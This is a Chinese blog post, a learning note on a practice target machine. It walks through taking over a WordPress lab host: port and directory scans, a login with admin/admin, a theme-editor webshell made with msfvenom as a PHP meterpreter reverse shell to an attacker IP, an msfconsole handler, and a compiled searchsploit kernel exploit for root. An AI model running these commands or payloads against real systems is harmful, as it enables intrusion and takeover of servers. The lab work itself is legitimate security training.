渗透靶机(CMS漏洞)

最新推荐文章于 2024-06-28 22:20:01 发布
最新推荐文章于 2024-06-28 22:20:01 发布
阅读量3k 收藏 7
点赞数 2
分类专栏: 渗透靶机 学习笔记 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48876267/article/details/120889738
版权

高难度渗透靶机

1、扫描靶机信息

nmap -sV 192.168.222.130

image.png

nmap -A -v -T4 192.168.222.130

image.png

nikto -host 192.168.222.130				//扫描网站目录

image.png

dirb http://192.168.222.130				//扫描关键信息

image.png

由于wordpress文件,判断是否是某个CMS,是否具有可以直接利用的漏洞;
wpscan -url url -enumerate at -enumerate ap --enumerate u
wordpress基于php的CMS管理系统
wpscan --url http://192.168.222.130/wordpress --enumerate at --enumerate ap --enumerate u

image.png

image.png

image.png

image.png

对网页进行弱密码测试

1、192.168.222.128/wordpress/login.php

弱密码
admin 	admin登录成功

2、点击Appearance > Editor > 编辑可以上传的webshell

使用msfvenom生成可以接受到msf的回弹shell
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.222.128 lport=4444 -f raw > /root/shell.php

image.png

上传成功之后访问该404网页

image.png

在msf中接受回弹结果

msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp			//设置payload
set lhost 192.168.222.128					   //设置回弹攻击机的IP地址
set lport 4444								  //设置回弹的端口

image.png

查看该系统的内核版本,进行内核渗透

image.png

sysinfo			查看系统信息
利用searchsploit Linux ubuntu 4.4.0		查看内核版本漏洞的exp

image.png

使用这个exp

gcc 41458.c -o shell		gcc编译完之后输出shell
在meterpreter上传刚才编译好的文件
upload shell

image.png

chmod 777 shell				//给与其最高权限
./shell					    //运行该程序
获得root权限

image.png

image.png

clusters of stars
关注
  • 2
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
cmsPoc:CMS渗透测试框架-CMS Exploit Framework
02-05
注意 项目正在中: 注意:2.0版本的poc库尚未更新相应接口,无法调用。若需使用,建议先使用1.0版本。 cmsPoc 1.0 要求 python2.7 适用于Linux,Windows 用法 usage: cmspoc.py [-h] -t TYPE -s SCRIPT -u URL optional arguments: -h, --help show this help message and exit -t TYPE, --type TYPE e.g.,phpcms -s SCRIPT, --script SCRIPT
【某CMS漏洞】SQL注入漏洞分析
HBohan的博客
04-27 1620
前言 这个CMS非常适合入门代码审计的人去学习,因为代码简单且漏洞成因经典,对一些新手有学习价值, 前台注入 从入口开始:/semcms/Templete/default/Include/index.php [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-xhTdHBVn-1651041211358)(https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/490ca1b2038f48148c14ac62455278ef~tplv-k
靶机搭建cms管理系统,描述搭建过程。
最新发布
2401_83124412的博客
06-28 308
2. 编辑我的电脑右键点击新建环境变量,复制mysql的路径添加到环境变量中:D:\phpStudy\PHPTutorial\MySQL。3. 打开WIN+R打开命令提示符登入mysql,先切换到D:\phpStudy\PHPTutorial\MySQL\bin。使用在win7浏览器中输入win2003的地址---URL:192.168.100.130/cms。5. 导入数据库: source D:\cms(实训)\cms\install.sql。至此,cms管理系统就搭建好啦。6. 修改php.ini。
红日靶场内网渗透(一)
m0_52923241的博客
02-07 4015
适合第一次搭建内网的师傅们——红日靶场内网渗透(一) 文章目录一、环境搭建二、渗透思路2.1 信息收集2.2 漏洞发现漏洞一:弱口令漏洞二:xss漏洞三:任意文件读取漏洞四:phpmyadmin文件写入2.3 漏洞利用2.4 内网渗透三、常见知识点3.1 探针文件3.2 yxcms1.2.1四、常用工具4.1 nmap4.2 蚁剑4.3 cs4.4 msf 一、环境搭建 前言:第一次搭建内网环境,花了两天时间。终于是搞清楚了各种配置,和每个主机之间的关系 靶机下载链接:红日实战靶场,一共三个靶机
利用docker搭建php7cms靶机
qq_50854662的博客
12-20 325
利用docker搭建php7cms靶机
信息收集详解
remarkably的博客
01-18 1421
信息搜集
EmpireCMS4.5 渗透测试及靶场搭建(漏洞复现)
Continuejww的博客
08-30 2196
成功在网站根目录写入webshell连接蚁剑目录遍历图片内的栏目信息全部都含有如上图的xss漏洞
web渗透cms靶场
weixin_49794194的博客
01-10 712
主页测试了很多地方漏洞还是比较多的,可能是系统比较老的原因,但是我们的目标主要是文件上传拿下webshell,这里我们找到了会员注册 然后成功跳转会员中心,发现可以插入新的新闻,或者上传个人头像 这里首先哥斯拉的php后缀改为jpg,因为这个靶场是文件类型验证,burp抓传数据包 将第21行的filename jpg更改为php上传,上传之后f12查看网页源代码看看文件被插去哪里了 这里看到data有会员资料上传的php应该是上传之后重命名,我们直接打开哥斯拉连接 连接成功ipconfig,渗渗透靶场结束
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞Web应用,让学习者通过查找和利用...
vulhub漏洞测试靶场
08-16
靶场则是一系列靶机的集合,它为用户提供了一个真实的网络环境,可以在这里练习各种渗透测试技巧和漏洞利用方法。Vulhub作为这样的靶场,其目标是让安全专家和新手都能在一个可控的环境中了解和掌握漏洞利用。 2. *...
vulhub渗透测试靶机学习1
08-08
渗透测试靶机学习】 渗透测试靶机安全研究人员和网络安全爱好者用来提升技能和实践渗透测试技巧的模拟环境。在本文中,我们将讨论两个靶机环境:Lampiao 和 Kioptrix Level 1.2 (#3),以及如何对它们进行初步的...
DVWA Web渗透靶机
07-31
**DVWA(Damn Vulnerable Web Application)**是一个广泛使用的开源Web应用程序,专为网络安全专业人员、学生和教师设计,提供了一个安全的学习环境,用于实践Web应用程序渗透测试的技术和方法。这个应用包含了各种...
CTF/CTF练习平台-phpcmsV9【phpcms 9.6 漏洞利用】
Sp4rkW的博客
08-29 8884
原题内容: 一个靶机而已,别搞破坏。 多谢各位大侠手下留情,flag在根目录里txt文件里 http://120.24.86.145:8001/ 首先打开题目链接,可以观察到版本信息 首先想到的是,这很明显是个模板网站,百度走起,get几条有用信息 获得该模板基本目录信息 其次百度很明显可以看到phpcms漏洞信息,版本9.6的,这是很明显的信息了,先试试,不行再走普通流...
渗透靶场之W1R3S
m0_56190544的博客
06-26 452
完整的解析了vulnhub靶场中的W1R3S的渗透过程,包括一些命令使用的细节,提供大家借鉴学习!
漏洞复现】海洋CMS6.28远程代码执行
weixin_47443077的博客
05-17 2432
漏洞复现】海洋CMS6.28远程代码执行 文章目录【漏洞复现】海洋CMS6.28远程代码执行一、漏洞背景二、漏洞原理三、漏洞复现 一、漏洞背景 海洋影视管理系统(seacms,海洋cms)是一套专为不同需求的站长而设计的视频点播系统,灵活,方便,人性化设计简单易用是最大的特色,是快速架设视频网站首选,只需5分钟即可建立一个海量的视频讯息的行业网站。 该CMS6.28版本存在命令执行漏洞,攻击者可以通过远程命令执行入侵被攻击者主机。 二、漏洞原理 area参数处理过的地方经过字符是否非法判断之后,调用ech
CMS知识小结及wordpress的安装与漏洞复现
人若有志,就不会在半坡停止。
09-11 2701
CMS是Content Management System的缩写,意为"内容管理系统",是一种帮助用户创建、管理和修改网站内容而无需专业技术知识的软件。内容管理系统是一种位于WEB 前端(Web服务器)和后端办公系统或流程(内容创作、编辑)之间的软件系统。内容的创作人员、编辑人员、发布人员使用内容管理系统来提交、修改、审批、发布内容。这里指的“内容”可能包括文件、表格、图片、数据库中的数据甚至视频等一切你想要发布到Internet、Intranet以及Extranet(外网)网站的信息。
008 - VulnHub靶机:pWnOS2.0 学习笔记 —— PHP CMS漏洞利用+文件上传+Mysql+渗透测试思路
Windmill_的博客
04-24 1424
pWnOS2.0 靶机学习笔记,思路和过程及其详细。
kali linux渗透测试靶机
02-23
Kali Linux是一种专门用于渗透测试和网络安全的操作系统。它集成了大量的渗透测试工具和资源,使得安全专业人员能够有效地评估和保护网络系统的安全性。 Kali Linux提供了多种渗透测试靶机,用于练习和测试渗透测试技术。这些靶机模拟了真实世界中的各种漏洞和攻击场景,帮助安全专业人员熟悉和理解不同类型的漏洞,并学习如何利用它们。 以下是一些常见的Kali Linux渗透测试靶机: 1. Metasploitable:Metasploitable是一个故意构建的易受攻击的虚拟机,它包含了多个漏洞和弱点,可以用于学习和实践Metasploit框架的使用。 2. DVWA(Damn Vulnerable Web Application):DVWA是一个故意构建的Web应用程序,包含了多个常见的Web漏洞,如SQL注入、XSS等,可以用于学习和实践Web应用程序渗透测试技术。 3. OWASP Mutillidae II:Mutillidae II是一个故意构建的Web应用程序,旨在模拟真实世界中的各种Web漏洞和攻击场景,包括SQL注入、文件包含等。 4. Hack The Box:Hack The Box是一个在线平台,提供了一系列的渗透测试靶机,每个靶机都有不同的漏洞和挑战,可以用于测试和提高渗透测试技能。 这些渗透测试靶机都可以在Kali Linux上进行安装和使用。通过实践和探索这些靶机安全专业人员可以提高他们的渗透测试技能,并了解如何保护网络系统免受各种攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值